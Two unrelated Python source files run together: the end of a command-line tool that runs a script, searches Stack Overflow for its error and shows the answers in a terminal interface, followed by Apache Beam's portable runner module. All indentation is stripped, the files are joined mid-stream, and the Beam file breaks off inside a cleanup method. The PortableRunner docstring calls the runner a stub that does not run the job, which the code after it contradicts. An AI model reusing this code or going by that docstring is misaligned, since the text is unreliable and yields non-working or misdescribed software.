if isinstance(stylized_text[-2], tuple):
# Remove newline from questions/answers that end with a code block
if stylized_text[-2][1].endswith('\n'):
stylized_text[-2] = ("code", stylized_text[-2][1][:-1])
return urwid.Text(stylized_text)
def get_search_results(soup):
"""Returns a list of dictionaries containing each search result."""
search_results = []
for result in soup.find_all("div", class_="question-summary search-result"):
title_container = result.find_all("div", class_="result-link")[0].find_all("a")[0]
if result.find_all("div", class_="status answered") != []: # Has answers
answer_count = int(result.find_all("div", class_="status answered")[0].find_all("strong")[0].text)
elif result.find_all("div", class_="status answered-accepted") != []: # Has an accepted answer (closed)
answer_count = int(result.find_all("div", class_="status answered-accepted")[0].find_all("strong")[0].text)
else: # No answers
answer_count = 0
search_results.append({
"Title": title_container["title"],
#"Body": result.find_all("div", class_="excerpt")[0].text,
#"Votes": int(result.find_all("span", class_="vote-count-post ")[0].find_all("strong")[0].text),
"Answers": answer_count,
"URL": SO_URL + title_container["href"]
})
return search_results
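# Each returned dictionary has the following shape (values are illustrative):
#   {"Title": "How do I fix a NameError?", "Answers": 3,
#    "URL": "https://stackoverflow.com/questions/..."}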
def souper(url):
"""Turns a given URL into a BeautifulSoup object."""
try:
html = requests.get(url, headers={"User-Agent": random.choice(USER_AGENTS)})
except requests.exceptions.RequestException:
sys.stdout.write("\n%s%s%s" % (RED, "Rebound was unable to fetch Stack Overflow results. "
"Please check that you are connected to the internet.\n", END))
sys.exit(1)
if re.search("\.com/nocaptcha", html.url): # URL is a captcha page
return None
else:
return BeautifulSoup(html.text, "html.parser")
## Main ##
def search_stackoverflow(query):
"""Wrapper function for get_search_results."""
soup = souper(SO_URL + "/search?pagesize=50&q=%s" % query.replace(' ', '+'))
# TODO: Randomize the user agent
if soup is None:
return (None, True)
else:
return (get_search_results(soup), False)
def get_question_and_answers(url):
"""Returns details about a given question and list of its answers."""
soup = souper(url)
if soup is None: # Captcha page
return "Sorry, Stack Overflow blocked our request. Try again in a couple seconds.", "", "", ""
else:
question_title = soup.find_all('a', class_="question-hyperlink")[0].get_text()
question_stats = soup.find("div", attrs={"itemprop": "upvoteCount"}).get_text() # Vote count
question_stats += " Votes | Asked " + soup.find("time", attrs={"itemprop": "dateCreated"}).get_text() # Date created
question_desc = stylize_code(soup.find_all("div", class_="s-prose js-post-body")[0]) # TODO: Handle duplicates
answers = [stylize_code(answer) for answer in soup.find_all("div", class_="s-prose js-post-body")][1:]
if len(answers) == 0:
answers.append(urwid.Text(("no answers", u"\nNo answers for this question.")))
return question_title, question_desc, question_stats, answers
############
## INTERFACE
############
## Helper Classes ##
class Scrollable(urwid.WidgetDecoration):
# TODO: Fix scrolling behavior (works with up/down keys, not with cursor)
def sizing(self):
return frozenset([BOX,])
def selectable(self):
return True
def __init__(self, widget):
"""Box widget (wrapper) that makes a fixed or flow widget vertically scrollable."""
self._trim_top = 0
self._scroll_action = None
self._forward_keypress = None
self._old_cursor_coords = None
self._rows_max_cached = 0
self._rows_max_displayable = 0
self.__super.__init__(widget)
def render(self, size, focus=False):
maxcol, maxrow = size
# Render complete original widget
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
canv = urwid.CompositeCanvas(ow.render(ow_size, focus))
canv_cols, canv_rows = canv.cols(), canv.rows()
if canv_cols <= maxcol:
pad_width = maxcol - canv_cols
if pad_width > 0: # Canvas is narrower than available horizontal space
canv.pad_trim_left_right(0, pad_width)
if canv_rows <= maxrow:
fill_height = maxrow - canv_rows
if fill_height > 0: # Canvas is lower than available vertical space
canv.pad_trim_top_bottom(0, fill_height)
self._rows_max_displayable = maxrow
if canv_cols <= maxcol and canv_rows <= maxrow: # Canvas is small enough to fit without trimming
return canv
self._adjust_trim_top(canv, size)
# Trim canvas if necessary
trim_top = self._trim_top
trim_end = canv_rows - maxrow - trim_top
trim_right = canv_cols - maxcol
if trim_top > 0:
canv.trim(trim_top)
if trim_end > 0:
canv.trim_end(trim_end)
if trim_right > 0:
canv.pad_trim_left_right(0, -trim_right)
# Disable cursor display if cursor is outside of visible canvas parts
if canv.cursor is not None:
curscol, cursrow = canv.cursor
if cursrow >= maxrow or cursrow < 0:
canv.cursor = None
# Let keypress() know if original_widget should get keys
self._forward_keypress = bool(canv.cursor)
return canv
def keypress(self, size, key):
if self._forward_keypress:
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
# Remember previous cursor position if possible
if hasattr(ow, "get_cursor_coords"):
self._old_cursor_coords = ow.get_cursor_coords(ow_size)
key = ow.keypress(ow_size, key)
if key is None:
return None
# Handle up/down, page up/down, etc
command_map = self._command_map
if command_map[key] == urwid.CURSOR_UP:
self._scroll_action = SCROLL_LINE_UP
elif command_map[key] == urwid.CURSOR_DOWN:
self._scroll_action = SCROLL_LINE_DOWN
elif command_map[key] == urwid.CURSOR_PAGE_UP:
self._scroll_action = SCROLL_PAGE_UP
elif command_map[key] == urwid.CURSOR_PAGE_DOWN:
self._scroll_action = SCROLL_PAGE_DOWN
elif command_map[key] == urwid.CURSOR_MAX_LEFT: # "home"
self._scroll_action = SCROLL_TO_TOP
elif command_map[key] == urwid.CURSOR_MAX_RIGHT: # "end"
self._scroll_action = SCROLL_TO_END
else:
return key
self._invalidate()
def mouse_event(self, size, event, button, col, row, focus):
ow = self._original_widget
if hasattr(ow, "mouse_event"):
ow_size = self._get_original_widget_size(size)
row += self._trim_top
return ow.mouse_event(ow_size, event, button, col, row, focus)
else:
return False
def _adjust_trim_top(self, canv, size):
"""Adjust self._trim_top according to self._scroll_action"""
action = self._scroll_action
self._scroll_action = None
maxcol, maxrow = size
trim_top = self._trim_top
canv_rows = canv.rows()
if trim_top < 0:
# Negative trim_top values use bottom of canvas as reference
trim_top = canv_rows - maxrow + trim_top + 1
if canv_rows <= maxrow:
self._trim_top = 0 # Reset scroll position
return
def ensure_bounds(new_trim_top):
return max(0, min(canv_rows - maxrow, new_trim_top))
if action == SCROLL_LINE_UP:
self._trim_top = ensure_bounds(trim_top - 1)
elif action == SCROLL_LINE_DOWN:
self._trim_top = ensure_bounds(trim_top + 1)
elif action == SCROLL_PAGE_UP:
self._trim_top = ensure_bounds(trim_top - maxrow+1)
elif action == SCROLL_PAGE_DOWN:
self._trim_top = ensure_bounds(trim_top + maxrow-1)
elif action == SCROLL_TO_TOP:
self._trim_top = 0
elif action == SCROLL_TO_END:
self._trim_top = canv_rows - maxrow
else:
self._trim_top = ensure_bounds(trim_top)
if self._old_cursor_coords is not None and self._old_cursor_coords != canv.cursor:
self._old_cursor_coords = None
curscol, cursrow = canv.cursor
if cursrow < self._trim_top:
self._trim_top = cursrow
elif cursrow >= self._trim_top + maxrow:
self._trim_top = max(0, cursrow - maxrow + 1)
def _get_original_widget_size(self, size):
ow = self._original_widget
sizing = ow.sizing()
if FIXED in sizing:
return ()
elif FLOW in sizing:
return (size[0],)
def get_scrollpos(self, size=None, focus=False):
return self._trim_top
def set_scrollpos(self, position):
self._trim_top = int(position)
self._invalidate()
def rows_max(self, size=None, focus=False):
if size is not None:
ow = self._original_widget
ow_size = self._get_original_widget_size(size)
sizing = ow.sizing()
if FIXED in sizing:
self._rows_max_cached = ow.pack(ow_size, focus)[1]
elif FLOW in sizing:
self._rows_max_cached = ow.rows(ow_size, focus)
else:
raise RuntimeError("Not a flow/box widget: %r" % self._original_widget)
return self._rows_max_cached
@property
def scroll_ratio(self):
return self._rows_max_cached / self._rows_max_displayable
class ScrollBar(urwid.WidgetDecoration):
# TODO: Change scrollbar size and color(?)
def sizing(self):
return frozenset((BOX,))
def selectable(self):
return True
def __init__(self, widget, thumb_char=u'\u2588', trough_char=' ',
side=SCROLLBAR_RIGHT, width=1):
"""Box widget that adds a scrollbar to `widget`."""
self.__super.__init__(widget)
self._thumb_char = thumb_char
self._trough_char = trough_char
self.scrollbar_side = side
self.scrollbar_width = max(1, width)
self._original_widget_size = (0, 0)
self._dragging = False
def render(self, size, focus=False):
maxcol, maxrow = size
ow = self._original_widget
ow_base = self.scrolling_base_widget
ow_rows_max = ow_base.rows_max(size, focus)
if ow_rows_max <= maxrow: # Canvas fits without scrolling - no scrollbar needed
self._original_widget_size = size
return ow.render(size, focus)
sb_width = self._scrollbar_width
self._original_widget_size = ow_size = (maxcol-sb_width, maxrow)
ow_canv = ow.render(ow_size, focus)
pos = ow_base.get_scrollpos(ow_size, focus)
posmax = ow_rows_max - maxrow
# Thumb shrinks/grows according to the ratio of
# <number of visible lines> / <number of total lines>
thumb_weight = min(1, maxrow / max(1, ow_rows_max))
thumb_height = max(1, round(thumb_weight * maxrow))
# Thumb may only touch top/bottom if the first/last row is visible
top_weight = float(pos) / max(1, posmax)
top_height = int((maxrow-thumb_height) * top_weight)
if top_height == 0 and top_weight > 0:
top_height = 1
# Bottom part is remaining space
bottom_height = maxrow - thumb_height - top_height
assert thumb_height + top_height + bottom_height == maxrow
# Create scrollbar canvas
top = urwid.SolidCanvas(self._trough_char, sb_width, top_height)
thumb = urwid.SolidCanvas(self._thumb_char, sb_width, thumb_height)
bottom = urwid.SolidCanvas(self._trough_char, sb_width, bottom_height)
sb_canv = urwid.CanvasCombine([
(top, None, False),
(thumb, None, False),
(bottom, None, False),
])
combinelist = [(ow_canv, None, True, ow_size[0]), (sb_canv, None, False, sb_width)]
if self._scrollbar_side != SCROLLBAR_LEFT:
return urwid.CanvasJoin(combinelist)
else:
return urwid.CanvasJoin(reversed(combinelist))
@property
def scrollbar_width(self):
return max(1, self._scrollbar_width)
@scrollbar_width.setter
def scrollbar_width(self, width):
self._scrollbar_width = max(1, int(width))
self._invalidate()
@property
def scrollbar_side(self):
return self._scrollbar_side
@scrollbar_side.setter
def scrollbar_side(self, side):
if side not in (SCROLLBAR_LEFT, SCROLLBAR_RIGHT):
raise ValueError("scrollbar_side must be 'left' or 'right', not %r" % side)
self._scrollbar_side = side
self._invalidate()
@property
def scrolling_base_widget(self):
"""Nearest `base_widget` that is compatible with the scrolling API."""
def orig_iter(w):
while hasattr(w, "original_widget"):
w = w.original_widget
yield w
yield w
def is_scrolling_widget(w):
return hasattr(w, "get_scrollpos") and hasattr(w, "rows_max")
for w in orig_iter(self):
if is_scrolling_widget(w):
return w
@property
def scrollbar_column(self):
if self.scrollbar_side == SCROLLBAR_LEFT:
return 0
if self.scrollbar_side == SCROLLBAR_RIGHT:
return self._original_widget_size[0]
def keypress(self, size, key):
return self._original_widget.keypress(self._original_widget_size, key)
def mouse_event(self, size, event, button, col, row, focus):
ow = self._original_widget
ow_size = self._original_widget_size
handled = False
if hasattr(ow, "mouse_event"):
handled = ow.mouse_event(ow_size, event, button, col, row, focus)
if not handled and hasattr(ow, "set_scrollpos"):
if button == 4: # Scroll wheel up
pos = ow.get_scrollpos(ow_size)
if pos > 0:
ow.set_scrollpos(pos - 1)
return True
elif button == 5: # Scroll wheel down
pos = ow.get_scrollpos(ow_size)
ow.set_scrollpos(pos + 1)
return True
elif col == self.scrollbar_column:
ow.set_scrollpos(int(row*ow.scroll_ratio))
if event == "mouse press":
self._dragging = True
elif event == "mouse release":
self._dragging = False
elif self._dragging:
ow.set_scrollpos(int(row*ow.scroll_ratio))
if event == "mouse release":
self._dragging = False
return False
class SelectableText(urwid.Text):
def selectable(self):
return True
def keypress(self, size, key):
return key
## Helper Functions ##
def interleave(a, b):
result = []
while a and b:
result.append(a.pop(0))
result.append(b.pop(0))
result.extend(a)
result.extend(b)
return result
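# e.g. interleave([a1, a2], [b1, b2]) -> [a1, b1, a2, b2]; note that the input
# lists are consumed via pop(0) and will be empty afterwards.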
## Main ##
class App(object):
def __init__(self, search_results):
self.search_results, self.viewing_answers = search_results, False
self.palette = [
("title", "light cyan,bold", "default", "standout"),
("stats", "light green", "default", "standout"),
("menu", "black", "light cyan", "standout"),
("reveal focus", "black", "light cyan", "standout"),
("reveal viewed focus", "yellow, bold", "light cyan", "standout"),
("no answers", "light red", "default", "standout"),
("code", "brown", "default", "standout"),
("viewed", "yellow", "default", "standout")
]
self.menu = urwid.Text([
u'\n',
("menu", u" ENTER "), ("light gray", u" View answers "),
("menu", u" B "), ("light gray", u" Open browser "),
("menu", u" Q "), ("light gray", u" Quit"),
])
results = list(map(lambda result: urwid.AttrMap(SelectableText(self._stylize_title(result)), None, "reveal focus"), self.search_results)) # TODO: Add a wrap='clip' attribute
self.content = urwid.SimpleListWalker(results)
self.content_container = urwid.ListBox(self.content)
layout = urwid.Frame(body=self.content_container, footer=self.menu)
self.main_loop = urwid.MainLoop(layout, self.palette, unhandled_input=self._handle_input)
self.original_widget = self.main_loop.widget
self.main_loop.run()
def _handle_input(self, input):
if input == "enter" or (input[0]=='meta mouse press' and input[1]==1): # View answers Either press Enter or "ALT + Left Click"
url = self._get_selected_link()
if url is not None:
self.viewing_answers = True
question_title, question_desc, question_stats, answers = get_question_and_answers(url)
pile = urwid.Pile(self._stylize_question(question_title, question_desc, question_stats) + [urwid.Divider('*')] +
interleave(answers, [urwid.Divider('-')] * (len(answers) - 1)))
padding = ScrollBar(Scrollable(urwid.Padding(pile, left=2, right=2)))
#filler = urwid.Filler(padding, valign="top")
linebox = urwid.LineBox(padding)
menu = urwid.Text([
u'\n',
("menu", u" ESC "), ("light gray", u" Go back "),
("menu", u" B "), ("light gray", u" Open browser "),
("menu", u" Q "), ("light gray", u" Quit"),
])
# highlight the selected answer
_, idx = self.content_container.get_focus()
txt = self.content[idx].original_widget.text
self.content[idx] = urwid.AttrMap(SelectableText(txt), 'viewed', 'reveal viewed focus')
self.main_loop.widget = urwid.Frame(body=urwid.Overlay(linebox, self.content_container, "center", ("relative", 60), "middle", 23), footer=menu)
elif input in ('b', 'B') or (input[0] == 'ctrl mouse press' and input[1] == 1): # Open link: either press B (or b) or "CTRL + Left Click"
url = self._get_selected_link()
if url is not None:
webbrowser.open(url)
elif input == "esc": # Close window
if self.viewing_answers:
self.main_loop.widget = self.original_widget
self.viewing_answers = False
else:
raise urwid.ExitMainLoop()
elif input in ('q', 'Q'): # Quit
raise urwid.ExitMainLoop()
def _get_selected_link(self):
focus_widget, idx = self.content_container.get_focus() # Gets selected item
title = focus_widget.base_widget.text
for result in self.search_results:
if title == self._stylize_title(result): # Found selected title's search_result dict
return result["URL"]
def _stylize_title(self, search_result):
if search_result["Answers"] == 1:
return "%s (1 Answer)" % search_result["Title"]
else:
return "%s (%s Answers)" % (search_result["Title"], search_result["Answers"])
def _stylize_question(self, title, desc, stats):
new_title = urwid.Text(("title", u"%s" % title))
new_stats = urwid.Text(("stats", u"%s\n" % stats))
return [new_title, desc, new_stats]
#######
## MAIN
#######
## Helper Functions ##
def confirm(question):
"""Prompts a given question and handles user input."""
valid = {"yes": True, 'y': True, "ye": True,
"no": False, 'n': False, '': True}
prompt = " [Y/n] "
while True:
print(BOLD + CYAN + question + prompt + END)
choice = input().lower()
if choice in valid:
return valid[choice]
print("Please respond with 'yes' or 'no' (or 'y' or 'n').\n")
def print_help():
"""Prints usage instructions."""
print("%sRebound, V1.1.9a1 - Made by @shobrook%s\n" % (BOLD, END))
print("Command-line tool that automatically searches Stack Overflow and displays results in your terminal when you get a compiler error.")
print("\n\n%sUsage:%s $ rebound %s[file_name]%s\n" % (UNDERLINE, END, YELLOW, END))
print("\n$ python3 %stest.py%s => $ rebound %stest.py%s" % (YELLOW, END, YELLOW, END))
print("\n$ node %stest.js%s => $ rebound %stest.js%s\n" % (YELLOW, END, YELLOW, END))
print("\nIf you just want to query Stack Overflow, use the -q parameter: $ rebound -q %sWhat is an array comprehension?%s\n\n" % (YELLOW, END))
## Main ##
def main():
if len(sys.argv) == 1 or sys.argv[1].lower() == "-h" or sys.argv[1].lower() == "--help":
print_help()
elif sys.argv[1].lower() == "-q" or sys.argv[1].lower() == "--query":
query = ' '.join(sys.argv[2:])
search_results, captcha = search_stackoverflow(query)
if search_results != []:
if captcha:
print("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. Try again in a minute.\n", END))
return
else:
App(search_results) # Opens interface
else:
print("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END))
else:
language = get_language(sys.argv[1].lower()) # Gets the language name
if language == '': # Unknown language
print("\n%s%s%s" % (RED, "Sorry, Rebound doesn't support this file type.\n", END))
return
file_path = sys.argv[1:]
if language == 'java':
file_path = [f.replace('.class', '') for f in file_path]
output, error = execute([language] + file_path) # Compiles the file and pipes stdout
if (output, error) == (None, None): # Invalid file
return
error_msg = get_error_message(error, language) # Prepares error message for search
if error_msg is not None:
language = 'java' if language == 'javac' else language # Fix language compiler command
query = "%s %s" % (language, error_msg)
search_results, captcha = search_stackoverflow(query)
if search_results != []:
if captcha:
print("\n%s%s%s" % (RED, "Sorry, Stack Overflow blocked our request. Try again in a minute.\n", END))
return
elif confirm("\nDisplay Stack Overflow results?"):
App(search_results) # Opens interface
else:
print("\n%s%s%s" % (RED, "No Stack Overflow results found.\n", END))
else:
print("\n%s%s%s" % (CYAN, "No error detected :)\n", END))
return
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import functools
import itertools
import logging
import threading
import time
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability import portable_stager
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None
@staticmethod
def _create_environment(options):
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(environment_type,
environment_type)
try:
environment_urn = getattr(common_urns.environments,
environment_type).urn
except AttributeError:
raise ValueError(
'Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, portable_options):
# TODO Provide a way to specify a container Docker URL
# https://issues.apache.org/jira/browse/BEAM-6328
if not self._dockerized_job_server:
self._dockerized_job_server = job_server.StopOnExitJobServer(
job_server.DockerizedJobServer())
return self._dockerized_job_server
def create_job_service(self, options):
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer()
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return server.start()
def run_pipeline(self, pipeline, options):
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment(
'use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=sdk_worker_main._get_state_cache_size(options),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# Some runners won't detect the GroupByKey transform unless it has no
# subtransforms. Remove all sub-transforms until BEAM-4605 is resolved.
for _, transform_proto in list(
proto_pipeline.components.transforms.items()):
if transform_proto.spec.urn == common_urns.primitives.GROUP_BY_KEY.urn:
for sub_transform in transform_proto.subtransforms:
del proto_pipeline.components.transforms[sub_transform]
del transform_proto.subtransforms[:]
# Preemptively apply combiner lifting, until all runners support it.
# These optimizations commute and are idempotent.
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'lift_combiners').lower()
if not options.view_as(StandardOptions).streaming:
flink_known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn])
if pre_optimize == 'none':
pass
elif pre_optimize == 'all':
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.annotate_stateful_dofns_as_roots,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.fix_flatten_coders,
# fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.extract_impulse_stages,
fn_api_runner_transforms.remove_data_plane_ops,
fn_api_runner_transforms.sort_stages],
known_runner_urns=flink_known_urns)
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in 'lift_combiners':
phases.append(getattr(fn_api_runner_transforms, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s'
% phase_name)
proto_pipeline = fn_api_runner_transforms.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=flink_known_urns,
partial=True)
job_service = self.create_job_service(options)
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=portable_options.job_server_timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc._channel._Rendezvous as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action' : 'store', 'help' : option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true'\
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = options.get_all_options(add_extra_args_fn=add_runner_options)
# TODO: Define URNs for options.
# convert int values: https://issues.apache.org/jira/browse/BEAM-5509
p_options = {'beam:option:' + k + ':v1': (str(v) if type(v) == int else v)
for k, v in all_options.items()
if v is not None}
prepare_request = beam_job_api_pb2.PrepareJobRequest(
job_name='job', pipeline=proto_pipeline,
pipeline_options=job_utils.dict_to_struct(p_options))
_LOGGER.debug('PrepareJobRequest: %s', prepare_request)
prepare_response = job_service.Prepare(
prepare_request,
timeout=portable_options.job_server_timeout)
artifact_endpoint = (portable_options.artifact_endpoint
if portable_options.artifact_endpoint
else prepare_response.artifact_staging_endpoint.url)
if artifact_endpoint:
stager = portable_stager.PortableStager(
grpc.insecure_channel(artifact_endpoint),
prepare_response.staging_session_token)
retrieval_token, _ = stager.stage_job_resources(
options,
staging_location='')
else:
retrieval_token = None
try:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=prepare_response.preparation_id),
timeout=portable_options.job_server_timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain(
[next(state_stream)],
state_stream)
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=prepare_response.preparation_id),
timeout=portable_options.job_server_timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = job_service.Run(
beam_job_api_pb2.RunJobRequest(
preparation_id=prepare_response.preparation_id,
retrieval_token=retrieval_token))
if state_stream is None:
state_stream = job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(
job_id=run_response.job_id))
message_stream = job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(
job_id=run_response.job_id))
result = PipelineResult(job_service, run_response.job_id, message_stream,
state_stream, cleanup_callbacks)
if cleanup_callbacks:
# We wait here to ensure that we run the cleanup callbacks.
logging.info('Waiting until the pipeline has finished because the '
'environment "%s" has started a component necessary for the '
'execution.', portable_options.environment_type)
result.wait_until_finish()
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys
if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
class PipelineResult(runner.PipelineResult):
def __init__(self, job_service, job_id, message_stream, state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
def cancel(self):
try:
self._job_service.Cancel(beam_job_api_pb2.CancelJobRequest(
job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# Filter only messages with the "message_response" and error messages.
messages = [m.message_response for m in self._messages
if m.HasField('message_response')]
error_messages = [m for m in messages
if m.importance ==
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self):
def read_messages():
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(
message.state_response.state))
self._messages.append(message)
t = threading.Thread(target=read_messages, name='wait_until_finish_read')
t.daemon = True
t.start()
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
t.join(10)
break
if self._state != runner.PipelineState.DONE:
raise RuntimeError(
'Pipeline %s failed in state %s: %s' % (
self._job_id, self._state, self._last_error_message()))
return self._state
finally:
self._cleanup()
def _cleanup(self):
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
